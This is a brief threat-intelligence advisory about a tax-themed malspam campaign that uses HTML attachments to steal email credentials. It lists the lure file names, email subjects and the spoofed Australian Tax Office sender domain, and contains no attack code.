Author: Nick Sundvall
TLP: WHITE
On 1 February, we observed a malspam campaign distributing a Hypertext Markup Language (HTML) file designed to steal email credentials from the recipient. The campaign’s email subject references tax documents. In the United States, it is not unusual to see campaigns using tax-related lures at this time of the year.
This is not a very sophisticated campaign; the threat actor only appears to be seeking to steal the victim’s email address and password. If the victim does not have multi-factor authentication enabled for their email account, the threat actor can use the stolen credentials to log in, allowing them to gain access to the victim’s emails and potentially take over the account.
The threat actor used tax-themed email subjects to lure the recipient into opening the attached HTML file and input their credentials. However, the threat actor appears to have made a mistake with the names of the attached files, the subjects, and the spoofed sender address. They mostly refer to the Australian Tax Office (ATO) and Australian tax documents. The Australian tax season begins in July and ends in October.1
The names of the attached files included ATO Tax Invoice.html and eDocument Refund.html. Subjects of the emails included ATO 2020 Tax Payment plan and ATO TAX REFUND, while the email bodies were left blank. The sender address used @ato.gov.au.
Infoblox’s full report on this campaign will be available soon on our Threat Intelligence Reports page.